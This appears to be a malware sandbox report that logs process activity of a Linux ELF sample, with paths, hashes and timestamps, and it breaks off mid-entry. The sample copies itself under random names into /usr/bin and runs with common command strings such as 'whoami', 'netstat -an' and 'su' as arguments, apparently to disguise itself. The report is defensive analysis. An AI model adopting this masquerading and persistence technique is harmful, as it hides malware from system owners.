Analysis Process: eTASxT3bjO.elf PID: 5610, Parent PID: 5609

General

Start time (UTC):	16:17:12
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: evbjclrakz PID: 5610, Parent PID: 5609

General

Start time (UTC):	16:17:12
Start date (UTC):	09/04/2024
Path:	/usr/bin/evbjclrakz
Arguments:	/usr/bin/evbjclrakz uptime 5434
File size:	548627 bytes
MD5 hash:	d081c11279702c0cadddc5e2840ded04

Chronological Activities

Analysis Process: evbjclrakz PID: 5614, Parent PID: 5610

General

Start time (UTC):	16:17:12
Start date (UTC):	09/04/2024
Path:	/usr/bin/evbjclrakz
Arguments:	-
File size:	548627 bytes
MD5 hash:	d081c11279702c0cadddc5e2840ded04

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5612, Parent PID: 5434

General

Start time (UTC):	16:17:12
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5613, Parent PID: 5612

General

Start time (UTC):	16:17:12
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: evbjclrakz PID: 5613, Parent PID: 5612

General

Start time (UTC):	16:17:12
Start date (UTC):	09/04/2024
Path:	/usr/bin/evbjclrakz
Arguments:	/usr/bin/evbjclrakz pwd 5434
File size:	548627 bytes
MD5 hash:	d081c11279702c0cadddc5e2840ded04

Chronological Activities

Analysis Process: evbjclrakz PID: 5615, Parent PID: 5613

General

Start time (UTC):	16:17:12
Start date (UTC):	09/04/2024
Path:	/usr/bin/evbjclrakz
Arguments:	-
File size:	548627 bytes
MD5 hash:	d081c11279702c0cadddc5e2840ded04

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5620, Parent PID: 5434

General

Start time (UTC):	16:17:18
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5621, Parent PID: 5620

General

Start time (UTC):	16:17:18
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: xaxopmwzau PID: 5621, Parent PID: 5620

General

Start time (UTC):	16:17:18
Start date (UTC):	09/04/2024
Path:	/usr/bin/xaxopmwzau
Arguments:	/usr/bin/xaxopmwzau id 5434
File size:	548627 bytes
MD5 hash:	da1e3752488a7df1e7bfef777b4afd08

Chronological Activities

Analysis Process: xaxopmwzau PID: 5622, Parent PID: 5621

General

Start time (UTC):	16:17:18
Start date (UTC):	09/04/2024
Path:	/usr/bin/xaxopmwzau
Arguments:	-
File size:	548627 bytes
MD5 hash:	da1e3752488a7df1e7bfef777b4afd08

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5623, Parent PID: 5434

General

Start time (UTC):	16:17:18
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5624, Parent PID: 5623

General

Start time (UTC):	16:17:18
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: xaxopmwzau PID: 5624, Parent PID: 5623

General

Start time (UTC):	16:17:18
Start date (UTC):	09/04/2024
Path:	/usr/bin/xaxopmwzau
Arguments:	/usr/bin/xaxopmwzau top 5434
File size:	548627 bytes
MD5 hash:	da1e3752488a7df1e7bfef777b4afd08

Chronological Activities

Analysis Process: xaxopmwzau PID: 5627, Parent PID: 5624

General

Start time (UTC):	16:17:18
Start date (UTC):	09/04/2024
Path:	/usr/bin/xaxopmwzau
Arguments:	-
File size:	548627 bytes
MD5 hash:	da1e3752488a7df1e7bfef777b4afd08

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5625, Parent PID: 5434

General

Start time (UTC):	16:17:18
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5626, Parent PID: 5625

General

Start time (UTC):	16:17:18
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: xaxopmwzau PID: 5626, Parent PID: 5625

General

Start time (UTC):	16:17:18
Start date (UTC):	09/04/2024
Path:	/usr/bin/xaxopmwzau
Arguments:	/usr/bin/xaxopmwzau "netstat -an" 5434
File size:	548627 bytes
MD5 hash:	da1e3752488a7df1e7bfef777b4afd08

Chronological Activities

Analysis Process: xaxopmwzau PID: 5629, Parent PID: 5626

General

Start time (UTC):	16:17:18
Start date (UTC):	09/04/2024
Path:	/usr/bin/xaxopmwzau
Arguments:	-
File size:	548627 bytes
MD5 hash:	da1e3752488a7df1e7bfef777b4afd08

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5628, Parent PID: 5434

General

Start time (UTC):	16:17:18
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5630, Parent PID: 5628

General

Start time (UTC):	16:17:18
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: xaxopmwzau PID: 5630, Parent PID: 5628

General

Start time (UTC):	16:17:18
Start date (UTC):	09/04/2024
Path:	/usr/bin/xaxopmwzau
Arguments:	/usr/bin/xaxopmwzau whoami 5434
File size:	548627 bytes
MD5 hash:	da1e3752488a7df1e7bfef777b4afd08

Chronological Activities

Analysis Process: xaxopmwzau PID: 5633, Parent PID: 5630

General

Start time (UTC):	16:17:18
Start date (UTC):	09/04/2024
Path:	/usr/bin/xaxopmwzau
Arguments:	-
File size:	548627 bytes
MD5 hash:	da1e3752488a7df1e7bfef777b4afd08

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5631, Parent PID: 5434

General

Start time (UTC):	16:17:18
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5632, Parent PID: 5631

General

Start time (UTC):	16:17:18
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: xaxopmwzau PID: 5632, Parent PID: 5631

General

Start time (UTC):	16:17:18
Start date (UTC):	09/04/2024
Path:	/usr/bin/xaxopmwzau
Arguments:	/usr/bin/xaxopmwzau "ifconfig eth0" 5434
File size:	548627 bytes
MD5 hash:	da1e3752488a7df1e7bfef777b4afd08

Chronological Activities

Analysis Process: xaxopmwzau PID: 5634, Parent PID: 5632

General

Start time (UTC):	16:17:18
Start date (UTC):	09/04/2024
Path:	/usr/bin/xaxopmwzau
Arguments:	-
File size:	548627 bytes
MD5 hash:	da1e3752488a7df1e7bfef777b4afd08

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5638, Parent PID: 5434

General

Start time (UTC):	16:17:23
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5639, Parent PID: 5638

General

Start time (UTC):	16:17:23
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: ygqhgbaeei PID: 5639, Parent PID: 5638

General

Start time (UTC):	16:17:23
Start date (UTC):	09/04/2024
Path:	/usr/bin/ygqhgbaeei
Arguments:	/usr/bin/ygqhgbaeei "ifconfig eth0" 5434
File size:	548627 bytes
MD5 hash:	ea0139d29f09585000d854a5755d4701

Chronological Activities

Analysis Process: ygqhgbaeei PID: 5640, Parent PID: 5639

General

Start time (UTC):	16:17:23
Start date (UTC):	09/04/2024
Path:	/usr/bin/ygqhgbaeei
Arguments:	-
File size:	548627 bytes
MD5 hash:	ea0139d29f09585000d854a5755d4701

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5641, Parent PID: 5434

General

Start time (UTC):	16:17:23
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5642, Parent PID: 5641

General

Start time (UTC):	16:17:23
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: ygqhgbaeei PID: 5642, Parent PID: 5641

General

Start time (UTC):	16:17:23
Start date (UTC):	09/04/2024
Path:	/usr/bin/ygqhgbaeei
Arguments:	/usr/bin/ygqhgbaeei ifconfig 5434
File size:	548627 bytes
MD5 hash:	ea0139d29f09585000d854a5755d4701

Chronological Activities

Analysis Process: ygqhgbaeei PID: 5645, Parent PID: 5642

General

Start time (UTC):	16:17:24
Start date (UTC):	09/04/2024
Path:	/usr/bin/ygqhgbaeei
Arguments:	-
File size:	548627 bytes
MD5 hash:	ea0139d29f09585000d854a5755d4701

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5643, Parent PID: 5434

General

Start time (UTC):	16:17:23
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5644, Parent PID: 5643

General

Start time (UTC):	16:17:23
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: ygqhgbaeei PID: 5644, Parent PID: 5643

General

Start time (UTC):	16:17:23
Start date (UTC):	09/04/2024
Path:	/usr/bin/ygqhgbaeei
Arguments:	/usr/bin/ygqhgbaeei "sleep 1" 5434
File size:	548627 bytes
MD5 hash:	ea0139d29f09585000d854a5755d4701

Chronological Activities

Analysis Process: ygqhgbaeei PID: 5649, Parent PID: 5644

General

Start time (UTC):	16:17:24
Start date (UTC):	09/04/2024
Path:	/usr/bin/ygqhgbaeei
Arguments:	-
File size:	548627 bytes
MD5 hash:	ea0139d29f09585000d854a5755d4701

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5646, Parent PID: 5434

General

Start time (UTC):	16:17:24
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5647, Parent PID: 5646

General

Start time (UTC):	16:17:24
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: ygqhgbaeei PID: 5647, Parent PID: 5646

General

Start time (UTC):	16:17:24
Start date (UTC):	09/04/2024
Path:	/usr/bin/ygqhgbaeei
Arguments:	/usr/bin/ygqhgbaeei "netstat -antop" 5434
File size:	548627 bytes
MD5 hash:	ea0139d29f09585000d854a5755d4701

Chronological Activities

Analysis Process: ygqhgbaeei PID: 5651, Parent PID: 5647

General

Start time (UTC):	16:17:24
Start date (UTC):	09/04/2024
Path:	/usr/bin/ygqhgbaeei
Arguments:	-
File size:	548627 bytes
MD5 hash:	ea0139d29f09585000d854a5755d4701

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5648, Parent PID: 5434

General

Start time (UTC):	16:17:24
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5650, Parent PID: 5648

General

Start time (UTC):	16:17:24
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: ygqhgbaeei PID: 5650, Parent PID: 5648

General

Start time (UTC):	16:17:24
Start date (UTC):	09/04/2024
Path:	/usr/bin/ygqhgbaeei
Arguments:	/usr/bin/ygqhgbaeei top 5434
File size:	548627 bytes
MD5 hash:	ea0139d29f09585000d854a5755d4701

Chronological Activities

Analysis Process: ygqhgbaeei PID: 5652, Parent PID: 5650

General

Start time (UTC):	16:17:24
Start date (UTC):	09/04/2024
Path:	/usr/bin/ygqhgbaeei
Arguments:	-
File size:	548627 bytes
MD5 hash:	ea0139d29f09585000d854a5755d4701

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5655, Parent PID: 5434

General

Start time (UTC):	16:17:29
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5656, Parent PID: 5655

General

Start time (UTC):	16:17:29
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: kffnhivjdw PID: 5656, Parent PID: 5655

General

Start time (UTC):	16:17:29
Start date (UTC):	09/04/2024
Path:	/usr/bin/kffnhivjdw
Arguments:	/usr/bin/kffnhivjdw gnome-terminal 5434
File size:	548627 bytes
MD5 hash:	ee25b9571b3552e8da3d6f483dba4db6

Chronological Activities

Analysis Process: kffnhivjdw PID: 5658, Parent PID: 5656

General

Start time (UTC):	16:17:29
Start date (UTC):	09/04/2024
Path:	/usr/bin/kffnhivjdw
Arguments:	-
File size:	548627 bytes
MD5 hash:	ee25b9571b3552e8da3d6f483dba4db6

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5657, Parent PID: 5434

General

Start time (UTC):	16:17:29
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5659, Parent PID: 5657

General

Start time (UTC):	16:17:29
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: kffnhivjdw PID: 5659, Parent PID: 5657

General

Start time (UTC):	16:17:29
Start date (UTC):	09/04/2024
Path:	/usr/bin/kffnhivjdw
Arguments:	/usr/bin/kffnhivjdw whoami 5434
File size:	548627 bytes
MD5 hash:	ee25b9571b3552e8da3d6f483dba4db6

Chronological Activities

Analysis Process: kffnhivjdw PID: 5662, Parent PID: 5659

General

Start time (UTC):	16:17:29
Start date (UTC):	09/04/2024
Path:	/usr/bin/kffnhivjdw
Arguments:	-
File size:	548627 bytes
MD5 hash:	ee25b9571b3552e8da3d6f483dba4db6

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5660, Parent PID: 5434

General

Start time (UTC):	16:17:29
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5661, Parent PID: 5660

General

Start time (UTC):	16:17:29
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: kffnhivjdw PID: 5661, Parent PID: 5660

General

Start time (UTC):	16:17:29
Start date (UTC):	09/04/2024
Path:	/usr/bin/kffnhivjdw
Arguments:	/usr/bin/kffnhivjdw whoami 5434
File size:	548627 bytes
MD5 hash:	ee25b9571b3552e8da3d6f483dba4db6

Chronological Activities

Analysis Process: kffnhivjdw PID: 5665, Parent PID: 5661

General

Start time (UTC):	16:17:29
Start date (UTC):	09/04/2024
Path:	/usr/bin/kffnhivjdw
Arguments:	-
File size:	548627 bytes
MD5 hash:	ee25b9571b3552e8da3d6f483dba4db6

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5663, Parent PID: 5434

General

Start time (UTC):	16:17:29
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5664, Parent PID: 5663

General

Start time (UTC):	16:17:29
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: kffnhivjdw PID: 5664, Parent PID: 5663

General

Start time (UTC):	16:17:29
Start date (UTC):	09/04/2024
Path:	/usr/bin/kffnhivjdw
Arguments:	/usr/bin/kffnhivjdw "ifconfig eth0" 5434
File size:	548627 bytes
MD5 hash:	ee25b9571b3552e8da3d6f483dba4db6

Chronological Activities

Analysis Process: kffnhivjdw PID: 5668, Parent PID: 5664

General

Start time (UTC):	16:17:30
Start date (UTC):	09/04/2024
Path:	/usr/bin/kffnhivjdw
Arguments:	-
File size:	548627 bytes
MD5 hash:	ee25b9571b3552e8da3d6f483dba4db6

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5666, Parent PID: 5434

General

Start time (UTC):	16:17:29
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5667, Parent PID: 5666

General

Start time (UTC):	16:17:29
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: kffnhivjdw PID: 5667, Parent PID: 5666

General

Start time (UTC):	16:17:29
Start date (UTC):	09/04/2024
Path:	/usr/bin/kffnhivjdw
Arguments:	/usr/bin/kffnhivjdw "netstat -an" 5434
File size:	548627 bytes
MD5 hash:	ee25b9571b3552e8da3d6f483dba4db6

Chronological Activities

Analysis Process: kffnhivjdw PID: 5669, Parent PID: 5667

General

Start time (UTC):	16:17:30
Start date (UTC):	09/04/2024
Path:	/usr/bin/kffnhivjdw
Arguments:	-
File size:	548627 bytes
MD5 hash:	ee25b9571b3552e8da3d6f483dba4db6

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5672, Parent PID: 5434

General

Start time (UTC):	16:17:35
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5673, Parent PID: 5672

General

Start time (UTC):	16:17:35
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: zqylkjndwx PID: 5673, Parent PID: 5672

General

Start time (UTC):	16:17:35
Start date (UTC):	09/04/2024
Path:	/usr/bin/zqylkjndwx
Arguments:	/usr/bin/zqylkjndwx "netstat -an" 5434
File size:	548627 bytes
MD5 hash:	9863c52aa5ffb44be58647ee47948996

Chronological Activities

Analysis Process: zqylkjndwx PID: 5674, Parent PID: 5673

General

Start time (UTC):	16:17:35
Start date (UTC):	09/04/2024
Path:	/usr/bin/zqylkjndwx
Arguments:	-
File size:	548627 bytes
MD5 hash:	9863c52aa5ffb44be58647ee47948996

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5675, Parent PID: 5434

General

Start time (UTC):	16:17:35
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5676, Parent PID: 5675

General

Start time (UTC):	16:17:35
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: zqylkjndwx PID: 5676, Parent PID: 5675

General

Start time (UTC):	16:17:35
Start date (UTC):	09/04/2024
Path:	/usr/bin/zqylkjndwx
Arguments:	/usr/bin/zqylkjndwx "ifconfig eth0" 5434
File size:	548627 bytes
MD5 hash:	9863c52aa5ffb44be58647ee47948996

Chronological Activities

Analysis Process: zqylkjndwx PID: 5679, Parent PID: 5676

General

Start time (UTC):	16:17:35
Start date (UTC):	09/04/2024
Path:	/usr/bin/zqylkjndwx
Arguments:	-
File size:	548627 bytes
MD5 hash:	9863c52aa5ffb44be58647ee47948996

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5677, Parent PID: 5434

General

Start time (UTC):	16:17:35
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5678, Parent PID: 5677

General

Start time (UTC):	16:17:35
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: zqylkjndwx PID: 5678, Parent PID: 5677

General

Start time (UTC):	16:17:35
Start date (UTC):	09/04/2024
Path:	/usr/bin/zqylkjndwx
Arguments:	/usr/bin/zqylkjndwx who 5434
File size:	548627 bytes
MD5 hash:	9863c52aa5ffb44be58647ee47948996

Chronological Activities

Analysis Process: zqylkjndwx PID: 5682, Parent PID: 5678

General

Start time (UTC):	16:17:35
Start date (UTC):	09/04/2024
Path:	/usr/bin/zqylkjndwx
Arguments:	-
File size:	548627 bytes
MD5 hash:	9863c52aa5ffb44be58647ee47948996

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5680, Parent PID: 5434

General

Start time (UTC):	16:17:35
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5681, Parent PID: 5680

General

Start time (UTC):	16:17:35
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: zqylkjndwx PID: 5681, Parent PID: 5680

General

Start time (UTC):	16:17:35
Start date (UTC):	09/04/2024
Path:	/usr/bin/zqylkjndwx
Arguments:	/usr/bin/zqylkjndwx "ps -ef" 5434
File size:	548627 bytes
MD5 hash:	9863c52aa5ffb44be58647ee47948996

Chronological Activities

Analysis Process: zqylkjndwx PID: 5685, Parent PID: 5681

General

Start time (UTC):	16:17:35
Start date (UTC):	09/04/2024
Path:	/usr/bin/zqylkjndwx
Arguments:	-
File size:	548627 bytes
MD5 hash:	9863c52aa5ffb44be58647ee47948996

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5683, Parent PID: 5434

General

Start time (UTC):	16:17:35
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5684, Parent PID: 5683

General

Start time (UTC):	16:17:35
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: zqylkjndwx PID: 5684, Parent PID: 5683

General

Start time (UTC):	16:17:35
Start date (UTC):	09/04/2024
Path:	/usr/bin/zqylkjndwx
Arguments:	/usr/bin/zqylkjndwx "ls -la" 5434
File size:	548627 bytes
MD5 hash:	9863c52aa5ffb44be58647ee47948996

Chronological Activities

Analysis Process: zqylkjndwx PID: 5686, Parent PID: 5684

General

Start time (UTC):	16:17:35
Start date (UTC):	09/04/2024
Path:	/usr/bin/zqylkjndwx
Arguments:	-
File size:	548627 bytes
MD5 hash:	9863c52aa5ffb44be58647ee47948996

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5691, Parent PID: 5434

General

Start time (UTC):	16:17:41
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5692, Parent PID: 5691

General

Start time (UTC):	16:17:41
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: vijnytmbcx PID: 5692, Parent PID: 5691

General

Start time (UTC):	16:17:41
Start date (UTC):	09/04/2024
Path:	/usr/bin/vijnytmbcx
Arguments:	/usr/bin/vijnytmbcx su 5434
File size:	548627 bytes
MD5 hash:	58e08a371adcdc184b14882a86c3a02c

Chronological Activities

Analysis Process: vijnytmbcx PID: 5693, Parent PID: 5692

General

Start time (UTC):	16:17:41
Start date (UTC):	09/04/2024
Path:	/usr/bin/vijnytmbcx
Arguments:	-
File size:	548627 bytes
MD5 hash:	58e08a371adcdc184b14882a86c3a02c

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5694, Parent PID: 5434

General

Start time (UTC):	16:17:41
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5695, Parent PID: 5694

General

Start time (UTC):	16:17:41
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: vijnytmbcx PID: 5695, Parent PID: 5694

General

Start time (UTC):	16:17:41
Start date (UTC):	09/04/2024
Path:	/usr/bin/vijnytmbcx
Arguments:	/usr/bin/vijnytmbcx su 5434
File size:	548627 bytes
MD5 hash:	58e08a371adcdc184b14882a86c3a02c

Chronological Activities

Analysis Process: vijnytmbcx PID: 5698, Parent PID: 5695

General

Start time (UTC):	16:17:41
Start date (UTC):	09/04/2024
Path:	/usr/bin/vijnytmbcx
Arguments:	-
File size:	548627 bytes
MD5 hash:	58e08a371adcdc184b14882a86c3a02c

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5696, Parent PID: 5434

General

Start time (UTC):	16:17:41
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5697, Parent PID: 5696

General

Start time (UTC):	16:17:41
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: vijnytmbcx PID: 5697, Parent PID: 5696

General

Start time (UTC):	16:17:41
Start date (UTC):	09/04/2024
Path:	/usr/bin/vijnytmbcx
Arguments:	/usr/bin/vijnytmbcx "netstat -an" 5434
File size:	548627 bytes
MD5 hash:	58e08a371adcdc184b14882a86c3a02c

Chronological Activities

Analysis Process: vijnytmbcx PID: 5701, Parent PID: 5697

General

Start time (UTC):	16:17:41
Start date (UTC):	09/04/2024
Path:	/usr/bin/vijnytmbcx
Arguments:	-
File size:	548627 bytes
MD5 hash:	58e08a371adcdc184b14882a86c3a02c

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5699, Parent PID: 5434

General

Start time (UTC):	16:17:41
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5700, Parent PID: 5699

General

Start time (UTC):	16:17:41
Start date (UTC):	09/04/2024
